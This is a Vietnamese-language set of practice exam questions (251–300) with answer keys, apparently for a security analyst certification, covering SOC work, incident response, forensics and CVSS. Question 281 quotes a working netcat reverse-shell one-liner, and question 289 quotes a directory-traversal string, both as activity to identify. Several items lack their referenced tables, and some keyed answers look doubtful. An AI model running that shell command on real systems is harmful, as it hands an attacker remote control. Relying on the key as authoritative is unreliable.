Câu 251
Câu hỏi: SOC nhận được thông báo tình báo về mối đe dọa cho biết thông tin đăng nhập của một nhân viên đã được tìm thấy trên web đen. Các hoạt động web và đăng nhập của người dùng đã được xem xét để tìm các kết nối độc hại hoặc bất thường, tải lên/tải xuống dữ liệu và khai thác. Việc xem xét các biện pháp kiểm soát đã xác nhận xác thực đa yếu tố đã được bật. Điều nào sau đây nên được thực hiện trước tiên để giảm thiểu tác động đến mạng và tài sản của doanh nghiệp?
A. Thực hiện đặt lại mật khẩu bắt buộc.
B. Truyền đạt thông tin đăng nhập bị xâm phạm cho người dùng.
C. Thực hiện quét AV ad hoc trên máy tính xách tay của người dùng.
D. Xem xét và đảm bảo các đặc quyền được gán cho tài khoản của người dùng phản ánh đặc quyền tối thiểu.
E. Hạ thấp ngưỡng cho cảnh báo SOC về hoạt động đáng ngờ.
Đáp án: A
Câu 252
Câu hỏi: Một chuyên gia phân tích bảo mật đang làm việc trên chính sách quản lý bản vá máy chủ cho phép nhóm cơ sở hạ tầng được thông báo nhanh hơn về các bản vá mới. Điều nào sau đây có nhiều khả năng được yêu cầu bởi nhóm cơ sở hạ tầng để các lỗ hổng có thể được khắc phục nhanh chóng? (Chọn hai).
A. Tên máy chủ
B. KPI bị thiếu
C. Chi tiết CVE
D. Tính khả dụng của POC
E. IoC
F. Mã định danh npm
Đáp án: C và E
Câu 253
Câu hỏi: Giám đốc An ninh Thông tin (CISO) muốn vô hiệu hóa một chức năng trên ứng dụng web quan trọng cho doanh nghiệp dễ bị tấn công RCE để duy trì mức độ rủi ro tối thiểu với chi phí tăng thêm tối thiểu. Xử lý rủi ro nào sau đây mô tả đúng nhất những gì CISO đang tìm kiếm?
A. Chuyển giao
B. Giảm thiểu
C. Chấp nhận
D. Tránh
Đáp án: B
Câu 254
Câu hỏi: Một công ty có biện pháp kiểm soát chính để hạn chế quyền truy cập vào cơ sở dữ liệu nhạy cảm. Tuy nhiên, công ty đã phát hiện ra một lỗ hổng xác thực có thể bỏ qua biện pháp kiểm soát này. Biện pháp kiểm soát bù trừ nào sau đây là tốt nhất?
A. Thực hiện kiểm tra thâm nhập thường xuyên để xác định và giải quyết các lỗ hổng mới.
B. Tiến hành đào tạo nâng cao nhận thức bảo mật thường xuyên cho nhân viên để ngăn chặn các cuộc tấn công social engineering.
C. Triển khai thêm một lớp kiểm soát truy cập để xác minh các cá nhân được ủy quyền.
D. Triển khai phần mềm phát hiện xâm nhập để cảnh báo các nhóm bảo mật về các nỗ lực truy cập trái phép.
Đáp án: C
Câu 255
Câu hỏi: Một chuyên gia phân tích phát hiện ra các kết nối ra ngoài bất thường đến một IP trước đây đã bị chặn tại proxy web và tường lửa. Sau khi điều tra thêm, có vẻ như các quy tắc proxy và tường lửa đã được xóa bởi một tài khoản dịch vụ không được công nhận. Phần nào sau đây của Chuỗi tiêu diệt mạng mô tả điều này?
A. Phân phối
B. Chỉ huy và kiểm soát
C. Trinh sát
D. Vũ khí hóa
Đáp án: B
Câu 256
Câu hỏi: Tài khoản email của một tổ chức đã bị xâm nhập bởi một tác nhân xấu. Cho biết các thông tin sau:
(bảng dữ liệu về chuỗi thời gian của sự cố)
Điều nào sau đây là khoảng thời gian mà nhóm mất để phát hiện ra mối đe dọa?
A. 25 phút
B. 40 phút
C. 45 phút
D. 2 giờ
Đáp án: A
Câu 257
Câu hỏi: Một người săn mối đe dọa tìm cách xác định các cơ chế kiên trì mới được cài đặt trong môi trường của tổ chức. Trong việc thu thập các tác vụ được lên lịch từ tất cả các máy trạm doanh nghiệp, các chi tiết máy chủ sau được tổng hợp:
(bảng dữ liệu về các tác vụ được lên lịch)
Dựa trên các chi tiết ở trên, người săn mối đe dọa nên thực hiện hành động nào sau đây trước tiên?
A. Lấy một bản sao của taskhw.exe từ máy chủ bị ảnh hưởng.
B. Quét doanh nghiệp để xác định các hệ thống khác có taskhw.exe.
C. Thực hiện tìm kiếm công khai các báo cáo phần mềm độc hại trên taskhw.exe.
D. Thay đổi tài khoản chạy tác vụ được lên lịch taskhw.exe.
Đáp án: A
Câu 258
Câu hỏi: Một chuyên gia phân tích SOC đang phân tích lưu lượng truy cập trên mạng và nhận thấy một lần quét trái phép. Loại hoạt động nào sau đây đang được quan sát?
A. Tiền thân tiềm năng của một cuộc tấn công
B. Giao tiếp ngang hàng trái phép
C. Thiết bị giả mạo trên mạng
D. Cập nhật hệ thống
Đáp án: A
Câu 259
(Câu hỏi dạng Hotspot – tương tác trên giao diện)
Câu 260
(Câu hỏi dạng Simulation – tương tác trên giao diện)
Câu 261
(Câu hỏi dạng Simulation – tương tác trên giao diện)
Câu 262
Câu hỏi: Một chuyên gia phân tích xem xét một cảnh báo gần đây của chính phủ về các mối đe dọa zero-day mới và tìm thấy các số liệu CVE sau đây cho các lỗ hổng nghiêm trọng nhất:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R
Điều nào sau đây thể hiện mức độ trưởng thành của mã khai thác của lỗ hổng nghiêm trọng này?
A. E:U
B. S:C
C. RC:R
D. AV:N
E. AC:L
Đáp án: A
Câu 263
Câu hỏi: Một chuyên gia phân tích bảo mật phát hiện một máy chủ email đã bị xâm nhập trong mạng nội bộ. Người dùng đã báo cáo các tin nhắn lạ trong hộp thư đến email của họ và lưu lượng mạng bất thường. Bước ứng phó sự cố nào sau đây nên được thực hiện tiếp theo?
A. Chuẩn bị
B. Xác thực
C. Ngăn chặn
D. Xóa bỏ
Đáp án: C
Câu 264
Câu hỏi: Cảnh báo SIEM được kích hoạt dựa trên việc thực thi một dòng lệnh đáng ngờ trên hai máy trạm trong môi trường của tổ chức. Một chuyên gia phân tích xem chi tiết của các sự kiện này bên dưới:
(dòng lệnh)
Câu nào sau đây mô tả đúng nhất ý định của kẻ tấn công, dựa trên dòng lệnh này?
A. Kẻ tấn công đang leo thang đặc quyền thông qua JavaScript.
B. Kẻ tấn công đang sử dụng phần mềm độc hại tùy chỉnh để tải xuống một tập lệnh bổ sung.
C. Kẻ tấn công đang thực thi tập lệnh PowerShell “AccessToken.ps1”.
D. Kẻ tấn công đang cố gắng cài đặt các cơ chế kiên trì trên máy mục tiêu.
Đáp án: C
Câu 265
Câu hỏi: Khi điều tra một máy chủ có khả năng bị xâm nhập, một chuyên gia phân tích quan sát thấy rằng quy trình BGInfo.exe (PID 1024), một công cụ Sysinternals được sử dụng để tạo hình nền màn hình chứa chi tiết máy chủ, đã chạy trong hơn hai ngày. Hoạt động nào sau đây sẽ cung cấp thông tin chi tiết nhất về quy trình độc hại tiềm ẩn này, dựa trên hành vi bất thường?
A. Thay đổi biến môi trường hệ thống
B. Lưu lượng mạng SMB liên quan đến quy trình hệ thống
C. Lịch sử trình duyệt gần đây của người dùng chính
D. Hoạt động được thực hiện bởi PID 1024
Đáp án: D
Câu 266
Câu hỏi: Phương pháp thu thập bằng chứng nào sau đây có nhiều khả năng được chấp nhận trong các vụ án tại tòa án nhất?
A. Sao chép tất cả các tệp truy cập tại thời điểm xảy ra sự cố
B. Tạo kho lưu trữ ở cấp độ tệp của tất cả các tệp
C. Cung cấp bản sao lưu đầy đủ hệ thống
D. Cung cấp ảnh ở cấp độ bit của ổ cứng
Đáp án: D
Câu 267
Câu hỏi: Một chuyên gia phân tích bảo mật mạng đã khôi phục máy chủ bị xâm nhập gần đây về trạng thái trước đó. Chuyên gia phân tích nên thực hiện điều nào sau đây tiếp theo?
A. Xóa bỏ
B. Cách ly
C. Báo cáo
D. Phân tích pháp y
Đáp án: D
Câu 268
(Câu hỏi dạng Simulation – tương tác trên giao diện)
Câu 269
Câu hỏi: Một chuyên gia phân tích bảo mật mạng đã được giao cho nhóm săn mối đe dọa để tạo ra một chiến lược phát hiện động dựa trên phân tích hành vi và các mẫu tấn công. Điều nào sau đây mô tả đúng nhất những gì chuyên gia phân tích sẽ tạo ra?
A. Bot
B. IoC
C. TTP
D. Chữ ký
Đáp án: C
Câu 270
Câu hỏi: Điều nào sau đây sẽ loại bỏ nhu cầu về các mật khẩu khác nhau cho nhiều ứng dụng nội bộ?
A. CASB
B. SSO
C. PAM
D. MFA
Đáp án: B
Câu 271
Câu hỏi: Điều nào sau đây giải thích rõ nhất tầm quan trọng của việc giao tiếp với nhân viên về kế hoạch giao tiếp công khai chính thức liên quan đến các sự cố ảnh hưởng đến tổ chức?
A. Để thiết lập thông tin nào được phép phát hành bởi các nhân viên được chỉ định
B. Để chỉ định một công ty quan hệ công chúng bên ngoài đại diện cho tổ chức
C. Để đảm bảo rằng tất cả các cơ quan truyền thông đều được thông báo cùng một lúc
D. Để xác định cách liên hệ với từng nhân viên sau khi xảy ra sự cố
Đáp án: A
Câu 272
Câu hỏi: Điều nào sau đây có nhiều khả năng được sử dụng để cập nhật bảng điều khiển tích hợp với nhiều công cụ của nhà cung cấp nhất?
A. Webhook
B. Ngôn ngữ đánh dấu mở rộng
C. Kết hợp nguồn cấp dữ liệu mối đe dọa
D. Ký hiệu đối tượng JavaScript
Đáp án: A
Câu 273
Câu hỏi: Một tổ chức có một ứng dụng tài chính quan trọng được lưu trữ trực tuyến không cho phép ghi nhật ký sự kiện gửi đến SIEM của công ty. Lựa chọn nào sau đây là tốt nhất để chuyên gia phân tích bảo mật cấu hình để cải thiện hiệu quả hoạt động bảo mật?
A. Định cấu hình SIEM mới dành riêng cho việc quản lý môi trường được lưu trữ.
B. Đăng ký nguồn cấp dữ liệu mối đe dọa liên quan đến ứng dụng của nhà cung cấp.
C. Sử dụng API do nhà cung cấp cung cấp để tự động kéo nhật ký trong thời gian thực.
D. Tải xuống và nhập nhật ký theo cách thủ công ngoài giờ làm việc.
Đáp án: C
Câu 274
Câu hỏi: Sau một sự cố, một chuyên gia phân tích bảo mật cần thực hiện phân tích pháp y để báo cáo thông tin đầy đủ cho bên liên quan của công ty. Mục tiêu nào sau đây có nhiều khả năng nhất là mục tiêu của phân tích pháp y trong trường hợp này?
A. Cung cấp bức tranh đầy đủ về các rủi ro hiện có.
B. Thông báo cho cơ quan thực thi pháp luật về vụ việc.
C. Ngăn chặn thêm sự cố.
D. Xác định thông tin nguyên nhân gốc rễ.
Đáp án: D
Câu 275
Câu hỏi: Lý do quan trọng nhất để nhóm ứng phó sự cố phát triển một tuyên bố sự cố chính thức là gì?
A. Để yêu cầu báo cáo sự cố thông qua các kênh thích hợp
B. Để xác định và ghi lại nhân viên có thẩm quyền giảm thiểu sự cố
C. Để cho phép tiết lộ công khai về sự kiện bảo mật ảnh hưởng đến tổ chức
D. Để thiết lập bộ phận chịu trách nhiệm ứng phó với sự cố
Đáp án: A
Câu 276
Câu hỏi: Một tổ chức đã thiết lập quy trình quản lý thay đổi chính thức sau khi gặp phải một số lỗi hệ thống nghiêm trọng trong năm qua. Yếu tố quan trọng nào sau đây mà quy trình quản lý thay đổi sẽ bao gồm để giảm tác động của lỗi hệ thống? (Chọn hai)
A. Đảm bảo người dùng ghi lại kế hoạch khôi phục hệ thống trước khi triển khai.
B. Thực hiện sao lưu toàn bộ ở cấp độ hệ thống sau khi thay đổi.
C. Sử dụng công cụ kiểm toán để xác định các thay đổi đang được thực hiện.
D. Xác định tài sản có sự phụ thuộc có thể bị ảnh hưởng bởi sự thay đổi.
E. Yêu cầu hoàn thành sơ đồ cho tất cả các hệ thống quan trọng.
F. Đảm bảo rằng tất cả tài sản được liệt kê đúng cách trong hệ thống quản lý kho.
Đáp án: A và D
Câu 277
Câu hỏi: Một chuyên gia phân tích đột nhiên không thể làm phong phú dữ liệu từ tường lửa. Tuy nhiên, các nguồn cấp dữ liệu tình báo mở khác vẫn tiếp tục hoạt động. Nguyên nhân nào sau đây có nhiều khả năng nhất khiến nguồn cấp dữ liệu tường lửa ngừng hoạt động?
A. Tài khoản dịch vụ tường lửa bị khóa.
B. Tường lửa đang sử dụng nguồn cấp dữ liệu trả phí.
C. Chứng chỉ tường lửa đã hết hạn.
D. Tường lửa bị lỗi mở.
Đáp án: C
Câu 278
Câu hỏi: Một chuyên gia phân tích bảo mật muốn tích hợp hai công cụ bảo mật dựa trên SaaS khác nhau để một công cụ có thể thông báo cho công cụ kia trong trường hợp phát hiện mối đe dọa. Chuyên gia phân tích nên sử dụng điều nào sau đây để đạt được mục tiêu này tốt nhất?
A. Chia sẻ SMB
B. Điểm cuối API
C. Thông báo SMTP
D. Bẫy SNMP
Đáp án: B
Câu 279
Câu hỏi: Một chuyên gia phân tích đang tạo ảnh ổ cứng được lấy từ hệ thống của một nhân viên bị nghi ngờ là bất hảo. Chuyên gia phân tích lưu ý rằng hàm băm ban đầu của ổ đĩa bằng chứng không khớp với hàm băm kết quả của bản sao được tạo ảnh. Điều nào sau đây mô tả rõ nhất lý do cho các phát hiện điều tra mâu thuẫn?
A. Chuỗi lưu ký không được duy trì cho ổ đĩa bằng chứng.
B. Không có được ủy quyền hợp pháp trước khi thu giữ ổ đĩa bằng chứng.
C. Không thể xác minh tính toàn vẹn dữ liệu của ổ đĩa được tạo ảnh.
D. Việc tạo ảnh ổ đĩa bằng chứng được thực hiện mà không có trình chặn ghi.
Đáp án: D
Câu 280
Câu hỏi: Một nhóm phát triển đang chuẩn bị triển khai phiên bản beta của ứng dụng web và muốn nhanh chóng kiểm tra các lỗ hổng, bao gồm tiêm SQL, duyệt đường dẫn và kịch bản chéo trang. Nhóm bảo mật có nhiều khả năng đề xuất công cụ nào sau đây để thực hiện bài kiểm tra này?
A. Hashcat
B. OpenVAS
C. OWASP ZAP
D. Nmap
Đáp án: C
Câu 281
Câu hỏi: Một chuyên gia phân tích bảo mật đã phát hiện hoạt động đáng ngờ sau:
rm -f/tmp/f;mknod /tmp/fp;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f
Điều nào sau đây có nhiều khả năng mô tả hoạt động?
A. Xoay vòng mạng
B. Quét máy chủ
C. Leo thang đặc quyền
D. Reverse Shell
Đáp án: D
Câu 282
Câu hỏi: Một chuyên gia phân tích đang thiết kế hệ thống nhắn tin cho ngân hàng. Chuyên gia phân tích muốn bao gồm một tính năng cho phép người nhận tin nhắn chứng minh với bên thứ ba rằng tin nhắn đến từ người gửi. Chuyên gia phân tích có nhiều khả năng cố gắng đạt được mục tiêu bảo mật thông tin nào sau đây nhất?
A. Không thể phủ nhận
B. Xác thực
C. Ủy quyền
D. Toàn vẹn
Đáp án: A
Câu 283
Câu hỏi: Trước khi áp dụng kế hoạch khôi phục thảm họa, một số thành viên trong nhóm cần tập trung trong một phòng để xem xét các kịch bản đã viết. Điều nào sau đây mô tả đúng nhất những gì nhóm đang làm?
A. Mô phỏng
B. Bài tập trên bàn
C. Kiểm tra đầy đủ
D. Kiểm tra song song
Đáp án: B
Câu 284
Câu hỏi: Quản lý sự cố nên làm việc với những tổ chức nào sau đây để đảm bảo các quy trình chính xác được tuân thủ khi giao tiếp báo cáo sự cố cho công chúng, như một phương pháp hay nhất? (Chọn hai)
A. Cơ quan thực thi pháp luật
B. Quản trị
C. Pháp lý
D. Quản lý
E. Quan hệ công chúng
F. Nhân sự
Đáp án: E và F
Câu 285
Câu hỏi: Do một sự cố liên quan đến các thiết bị của công ty, người ứng phó sự cố cần mang điện thoại di động đến phòng thí nghiệm để điều tra thêm. Nên sử dụng công cụ nào sau đây để duy trì tính toàn vẹn của điện thoại di động khi vận chuyển? (Chọn hai)
A. Túi chắn tín hiệu
B. Niêm phong chống giả mạo
C. Ổ đĩa flash
D. Băng keo hiện trường vụ án
E. Trình chặn ghi
F. Bộ nhân bản ổ đĩa
Đáp án: A và B
Câu 286
Câu hỏi: Trong quá trình triển khai bản vá cho môi trường sản xuất, người ta phát hiện ra rằng các kết nối bắt buộc đến hệ thống từ xa không còn khả dụng nữa. Bước nào sau đây có nhiều khả năng phát hiện ra lỗ hổng này?
A. Triển khai
B. Kiểm tra chấp nhận của người dùng
C. Xác thực
D. Khôi phục
Đáp án: C
Câu 287
Câu hỏi: Một tổ chức đã theo dõi một số sự cố được liệt kê trong bảng sau:
(bảng dữ liệu về thời gian bắt đầu, thời gian phát hiện và thời gian trôi qua của các sự cố)
Điều nào sau đây là MTTD của tổ chức?
A. 140
B. 150
C. 160
D. 180
Đáp án: C
Câu 288
Câu hỏi: Một chuyên gia phân tích bảo mật đã tìm thấy một mục có rủi ro vừa phải trong ứng dụng bán hàng của tổ chức. Tổ chức hiện đang trong cửa sổ đóng băng thay đổi và đã quyết định rằng rủi ro không đủ cao để khắc phục tại thời điểm này. Điều nào sau đây là trở ngại cho việc khắc phục mà kịch bản này minh họa?
A. Thỏa thuận cấp độ dịch vụ
B. Gián đoạn quy trình kinh doanh
C. Giảm chức năng
D. Hệ thống độc quyền
Đáp án: B
Câu 289
Câu hỏi: Khi xem xét nhật ký máy chủ web, một chuyên gia phân tích bảo mật nhận thấy đoạn mã sau:
…./…./boot.ini
Điều nào sau đây đang được cố gắng thực hiện?
A. Duyệt thư mục
B. Bao gồm tệp từ xa
C. Kịch bản chéo trang
D. Thực thi mã từ xa
E. Liệt kê /etc/passwd
Đáp án: A
Câu 290
Câu hỏi: Mã khai thác cho một lỗ hổng phần mềm quan trọng được tiết lộ gần đây đã được công khai để tải xuống trong vài ngày trước khi bị xóa. Số liệu thời gian CVSS v.3.1 nào sau đây bị ảnh hưởng nhiều nhất bởi sự phơi bày này?
A. Mức độ khắc phục
B. Mức độ trưởng thành của mã khai thác
C. Độ tin cậy của báo cáo
D. Tính khả dụng
Đáp án: B
Câu 291
Câu hỏi: Điều nào sau đây trong quy trình pháp y kỹ thuật số được coi là hoạt động quan trọng thường bao gồm biểu diễn đồ họa của quy trình và các sự kiện hệ thống điều hành?
A. Chỉnh sửa sổ đăng ký
B. Lập bản đồ mạng
C. Phân tích dòng thời gian
D. Chặn ghi
Đáp án: C
Câu 292
Câu hỏi: Điều nào sau đây mô tả đúng nhất tầm quan trọng của KPI trong bài tập ứng phó sự cố?
A. Để xác định hiệu suất cá nhân của từng chuyên gia phân tích
B. Để mô tả cách giải quyết sự cố
C. Để tiết lộ những gì nhóm cần ưu tiên
D. Để phơi bày những công cụ nào nên được sử dụng
Đáp án: C
Câu 293
Câu hỏi: Một tổ chức đang tiến hành triển khai thử nghiệm ứng dụng thương mại điện tử. Mã nguồn của ứng dụng không khả dụng. Chuyên gia phân tích nên đề xuất chiến lược nào sau đây để đánh giá bảo mật của phần mềm?
A. Kiểm tra tĩnh
B. Kiểm tra lỗ hổng
C. Kiểm tra động
D. Kiểm tra thâm nhập
Đáp án: D
Câu 294
Câu hỏi: Một nhóm bảo mật cần chứng minh nhóm đã chuẩn bị như thế nào trong trường hợp xảy ra tấn công mạng. Điều nào sau đây sẽ chứng minh tốt nhất một sự cố trong thế giới thực mà không ảnh hưởng đến hoạt động?
A. Xem xét tài liệu bài học kinh nghiệm và tạo sổ tay.
B. Tập hợp tất cả các thành viên tham gia ứng phó sự cố nội bộ và thực hiện mô phỏng.
C. Triển khai phần mềm độc hại đã biết và ghi lại quy trình khắc phục.
D. Lên lịch khôi phục hệ thống đến trang web DR cho một số ứng dụng.
Đáp án: B
Câu 295
Câu hỏi: SOC nhận được một số cảnh báo cho biết tài khoản người dùng đang kết nối với nhà cung cấp nhận dạng của công ty thông qua giao tiếp không an toàn. Thông tin đăng nhập của người dùng để truy cập các hệ thống quan trọng, nhạy cảm về kinh doanh có thể bị lộ. SOC nên sử dụng nhật ký nào sau đây khi xác định ý định độc hại?
A. DNS
B. tcpdump
C. Thư mục
D. IDS
Đáp án: D
Câu 296
Câu hỏi: Quét lỗ hổng của máy chủ web được công khai trên internet gần đây đã được hoàn thành. Một chuyên gia phân tích bảo mật đang xem xét các chuỗi vectơ kết quả:
(danh sách các chuỗi vectơ lỗ hổng)
Lỗ hổng nào sau đây nên được vá trước?
A. Lỗ hổng 1
B. Lỗ hổng 2
C. Lỗ hổng 3
D. Lỗ hổng 4
Đáp án: A
Câu 297
Câu hỏi: Mỗi khi nhóm đánh giá lỗ hổng chia sẻ báo cáo thường xuyên với các nhóm khác, sự không nhất quán về phiên bản và bản vá trong cơ sở hạ tầng hiện có được phát hiện. Giải pháp nào sau đây là tốt nhất để giảm sự không nhất quán?
A. Triển khai quét có thông tin đăng nhập
B. Thay đổi từ phương pháp quét thụ động sang chủ động
C. Triển khai một vị trí trung tâm để quản lý tài sản CNTT
D. Thực hiện quét không có tác nhân
Đáp án: C
Câu 298
Câu hỏi: Một tổ chức có kế hoạch sử dụng một công cụ học máy nâng cao làm máy chủ thu thập trung tâm. Công cụ này sẽ thực hiện tổng hợp và phân tích dữ liệu. Tổ chức nên triển khai điều nào sau đây?
A. SIEM
B. Tường lửa
C. Máy chủ Syslog
D. Phân tích luồng
Đáp án: A
Câu 299
Câu hỏi: Một chuyên gia phân tích lỗ hổng đang viết báo cáo ghi lại các lỗ hổng mới nhất, nghiêm trọng nhất được xác định trong tháng qua. Kho lưu trữ MITRE công khai nào sau đây sẽ tốt nhất để xem xét?
A. Tình báo về mối đe dọa mạng
B. Lỗ hổng và phơi nhiễm phổ biến
C. Kho lưu trữ phân tích mạng
D. ATT&CK
Đáp án: B
Câu 300
Câu hỏi: Một tập đoàn muốn triển khai giải pháp điểm cuối dựa trên tác nhân để giúp:
• Cờ các mối đe dọa khác nhau
• Xem xét nguồn cấp dữ liệu lỗ hổng
• Tổng hợp dữ liệu
• Cung cấp số liệu thời gian thực bằng cách sử dụng ngôn ngữ kịch bản
Tập đoàn nên triển khai công cụ nào sau đây để đạt được mục tiêu này?
A. DLP
B. Heuristic
C. SOAR
D. NAC
Đáp án: C
Để lại một bình luận